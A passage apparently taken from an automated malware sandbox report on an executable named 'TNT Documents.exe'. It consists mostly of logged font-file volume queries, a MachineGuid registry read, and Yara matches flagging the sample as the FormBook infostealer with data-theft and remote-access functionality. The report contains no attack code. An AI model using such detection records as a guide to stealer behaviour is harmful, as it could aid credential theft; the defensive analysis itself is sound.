          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\marlett.ttf VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
          Source: C:\Users\user\Desktop\TNT Documents.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

          Stealing of Sensitive Information:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 7.2.TNT Documents.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.0.TNT Documents.exe.400000.8.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.0.TNT Documents.exe.400000.6.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.0.TNT Documents.exe.400000.6.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.2.TNT Documents.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.0.TNT Documents.exe.400000.8.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.0.TNT Documents.exe.400000.4.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0000000B.00000000.349024537.000000000F905000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000000.331135577.000000000F905000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000011.00000002.524379332.0000000003A30000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000011.00000002.523498302.0000000003310000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.361357634.00000000014F0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.361164513.00000000010D0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000011.00000002.524461205.0000000003A60000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000000.290851774.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000000.289769088.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.360525017.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.297323666.0000000003389000.00000004.00000001.sdmp, type: MEMORY

          Remote Access Functionality:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 7.2.TNT Documents.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.0.TNT Documents.exe.400000.8.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.0.TNT Documents.exe.400000.6.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.0.TNT Documents.exe.400000.6.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.2.TNT Documents.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.0.TNT Documents.exe.400000.8.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.0.TNT Documents.exe.400000.4.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0000000B.00000000.349024537.000000000F905000.00000040.00020000.sdmp, type: MEMORY
